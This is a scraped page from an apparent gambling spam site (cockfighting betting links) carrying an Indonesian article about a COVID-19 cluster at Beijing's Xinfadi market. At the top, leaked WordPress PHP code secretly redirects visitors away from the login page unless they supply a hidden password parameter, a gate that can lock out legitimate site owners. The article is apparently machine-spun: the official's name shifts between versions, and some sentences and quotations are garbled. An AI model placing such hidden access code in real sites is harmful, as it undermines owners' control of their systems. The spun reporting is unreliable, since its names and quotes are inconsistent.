//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Virus Corona kembali menyerang China, puluhan orang di Beijing tertular | adu ayam bali_s128.net login_s128.live

Virus Corona kembali menyerang China, puluhan orang di Beijing tertular

Beijing TRIBUNNEWS.COM-China belum sepenuhnya kebal terhadap dampak wabah korona. Setelah puluhan orang dinyatakan positif mengidap virus korona di daerah tersebut, sebuah daerah di Beijing memasuki “keadaan darurat perang.”

Beijing melarang aktivitas pariwisata dan olahraga pada hari Sabtu setelah kasus virus korona di sekitar pasar. Khawatir tentang babak baru epidemi virus korona. Reuters mengutip Zhu Junwei yang mengatakan bahwa 45 dari 517 orang yang diuji dengan usap tenggorokan di Pasar Xinfadi di Distrik Fengtai, Barat Daya Beijing, dinyatakan positif mengidap virus corona.

Bahkan jika tidak ada yang memiliki gejala Covid-19. Chu menambahkan, 11 blok di sekitar pasar, yang disebut-sebut sebagai pasar grosir pertanian terbesar di Asia, telah diamankan 24 jam.

Baca: Kasus Corona Bangkitnya DKI Jakarta Anies Baswedan: Kami bahkan mengaktifkan penemuan kasus- “Sesuai dengan prinsip mengutamakan keselamatan dan kesehatan masyarakat, kami telah melakukan tindakan penyitaan terhadap pasar baru dan lingkungannya. “Kata Zhu Guo Chi. “Mode darurat masa perang”.

Baca: Kasus Corona yang dilaporkan pernah meletus di Beijing, China, muncul kembali di Beijing, China, mirip dengan Wuhan pada saat mewabah.

Ketika kekhawatiran tentang pandemi korona kedua semakin meningkat, penutupan pasar dan pembatasan baru telah datang, 7,66 juta orang telah terinfeksi di seluruh dunia dan 420.000 orang telah meninggal. Menurut laporan, seluruh pasar Xinfadi ditutup pada jam 3 pagi pada hari Sabtu. Dua pria sebelumnya telah bekerja di pusat penelitian daging dan dilaporkan mengunjungi pasar baru-baru ini ketika dia terinfeksi virus corona. Tidak jelas bagaimana mereka terinfeksi.

Pada Sabtu (13/6), pintu masuk pasar diblokir dan polisi berjaga. Pemerintah Kota Beijing sebelumnya telah menghentikan penjualan daging sapi dan kulit kambing di pasar dan menutup pasar grosir lainnya di sekitar kota.

Leave a comment

adu ayam bali_s128.net login_s128.live